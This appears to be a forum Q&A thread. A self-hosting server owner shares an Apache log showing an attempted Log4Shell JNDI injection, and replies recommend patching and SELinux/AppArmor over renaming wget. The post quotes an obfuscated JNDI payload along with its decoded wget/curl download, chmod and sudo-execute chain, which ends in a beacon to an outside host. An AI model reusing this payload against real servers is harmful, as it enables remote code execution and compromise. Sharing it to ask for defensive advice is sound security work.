apache remove wget for better security

Im no expert at IT or apache but I have used linux for years. Ive done my best to harden/secure my server online which I use for a mobile app which needs to serve up its content etc.

Ive noticed some attempts at hacking my Apache 2.4.57 server (apparently?) using wget and log4j today. I do not have tomcat, just a simple httpd running php.

Here's a log entry. (Ive changed the IP ADDRESS info in the log entry to X.X.X.X. Also notice the status 200 return code which meant it succeeded:

  [Sat Apr 08 16:08:57.428096 2023] [http:trace3] [pid 15227:tid 140593883580160] http_filters.c(1132): [client X.X.X.X:52832] Response sent with status 200, referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//X.X.X.X:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY3VybCAtTyBodHRwOi8vMTM0LjY1LjYyLjY0Ly5jb25maWcvemxpYjQ1IDsgY2htb2QgK3ggemxpYjQ1IDsgY2htb2QgNzc3IHpsaWI0NSA7IC4vemxpYjQ1IDIgOyBzdWRvIC4vemxpYjQ1IDIgOyBybSAtcmYgemxpYjQ1OyBjdXJsIGh0dHA6Ly8xMjkuMTUxLjY0LjU1L2FyY2gvJCh1bmFtZSAtbSkvdXNlci8kKHdob2FtaSk7IHN1ZG8gY3VybCBodHRwOi8vMTI5LjE1MS42NC41NS9hcmNoLyQodW5hbWUgLW0pL3VzZXIvJCh3aG9hbWkp}')

Decoding the base64 is: (replaced IP ADDRESS with X.X.X.X):

  wget http://X.X.X.X/.config/zlib45 ; curl -O http://X.X.X.X/.config/zlib45 ; chmod +x zlib45 ; chmod 777 zlib45 ; ./zlib45 2 ; sudo ./zlib45 2 ; rm -rf zlib45; curl http://X.X.X.X/arch/$(uname -m)/user/$(whoami); sudo curl http://X.X.X.X/arch/$(uname -m)/user/$(whoami)

My question is, I already moved the wget executable to a different filename not guessable by someone, something like: wget_wget for instance.

I also do not have any java on my server and Ive searched for log4j and not found anything on that either (although it could be elsewhere or inside the apache executable?).

So my questions are:

1. Is removing/moving wget a good idea for better security?
2. Since wget isnt a file that can be executed on my system how did it return status 200?
3. Did it really execute those commands on my server?
4. Is it really using/running log4j on my system based on the log entry?

I have multiple other log lines similiar to this one from the same IP address so Id like suggestions and more expert opinions on what Im seeing and how to better secure my server from this? Im running fail2ban but that wont stop this type of attack.

Thanks in advance!

What you're doing is likely to break your system. It's not likely to hamper progress for an attacker.

You should:

1. Maintain a patched system, so that known vulnerabilities can not be exploited.
2. Look into using a solution such as AppArmour or SELinux to limit what Apache can do.

You should not start renaming system utilities. First, it's liable to break your system, and second, it won't work - there's too many utilities that is useful to an attacker. For instance Python has methods to grab an URL. Or Perl. Or php. Or ... likely at least ten other ways.

SELinux or AppArmour can limit what software can do. It can ensure that your apache user can't execute commands, yet allow your user (and other system users) the right to do so.

My humble opinion is that wget isn't harmful at all. It's a tool like curl for http requests. Even the attacker is able to upload something in your system, like using wget to download it, the user permission that execute it is the problem and of course the chmod 777. Just patch the system on regular basis and use non-sudo and non-root user for the tasks (add the needed permission for the user in /etc/sudoers)